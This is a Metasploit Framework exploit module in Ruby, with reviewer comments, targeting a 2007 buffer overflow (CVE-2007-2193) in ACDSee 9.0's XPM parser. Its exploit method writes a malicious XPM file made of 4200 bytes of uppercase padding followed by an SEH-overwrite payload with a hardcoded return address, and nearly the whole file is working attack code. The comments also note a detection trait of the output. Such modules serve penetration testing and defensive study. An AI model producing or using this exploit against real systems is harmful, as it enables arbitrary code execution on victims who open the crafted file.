GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/acdsee_xpm.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  # Declares module metadata and the FILENAME option.
  #
  # This is a file-format module: #exploit writes a crafted XPM file through
  # file_create instead of connecting to a remote host. The single target
  # carries the 'Ret' value that #exploit hands to generate_seh_payload.
  #
  # @param info [Hash] metadata merged by update_info before being passed to super
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ACDSee XPM File Section Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in ACDSee 9.0.
          When viewing a malicious XPM file with the ACDSee product,
          a remote attacker could overflow a buffer and execute
          arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Author' => 'MC',
        'References' => [
          [ 'CVE', '2007-2193' ],
          [ 'OSVDB', '35236' ],
          [ 'BID', '23620' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          # NOTE(review): presumably disabled because the module only writes a
          # file and never contacts a target, so any handler is started
          # separately — confirm against the framework docs.
          'DisablePayloadHandler' => true,
          'AllowWin32SEH' => true
        },
        'Payload' => {
          # Encoder constraints. The uppercase-alphanumeric encoder type matches
          # the rand_text_alpha_upper padding that surrounds the payload in
          # #exploit. "\x00" is excluded presumably so the payload survives as
          # part of the quoted XPM text string — confirm against the parser.
          'Space' => 750,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
          'DisableNops' => true,
        },
        'Platform' => 'win',
        'Targets' => [
          # 'Ret' is read as target.ret and passed to generate_seh_payload in #exploit.
          [ 'ACDSee 9.0 (Build 1008)', { 'Ret' => 0x10020758 } ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2007-11-23',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Output file name; read back in #exploit via datastore['FILENAME'].
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.xpm']),
      ]
    )
  end

  # Builds the crafted XPM file and writes it with file_create.
  #
  # Output layout (format reference linked below): an XPM comment header, a
  # `static char * NAME[] = {` line whose NAME is 1-25 random uppercase
  # letters, then one quoted string made of 4200 random uppercase letters
  # followed by the SEH payload, and the closing `",` / `};` lines. Line
  # endings are CRLF throughout.
  #
  # From a defensive standpoint the distinguishing feature of the output is a
  # single XPM pixel string of more than 4200 uppercase letters, not any fixed
  # byte sequence: the padding and the array name are regenerated on every run.
  #
  # Returns nothing useful; the only side effect is the file named by the
  # FILENAME datastore option.
  def exploit
    # Random identifier for the pixel array, 1..25 characters long.
    filler = rand_text_alpha_upper(rand(25) + 1)

    # http://www.fileformat.info/format/xpm/
    head = "/* XPM */\r\n"
    head << "static char * #{filler}[] = {\r\n"
    # Opens the single quoted pixel string that carries the oversized data.
    head << "\""

    # Constant-length (4200) uppercase padding precedes the SEH payload; the
    # length is fixed across runs while the bytes are random. Presumably 4200
    # is the distance to the overwritten SEH record — confirm.
    buff = rand_text_alpha_upper(4200) + generate_seh_payload(target.ret)

    # Closes the pixel string and the array declaration.
    foot = "\",\r\n" + "};\r\n"

    xpm = head + buff + foot

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(xpm)
  end
end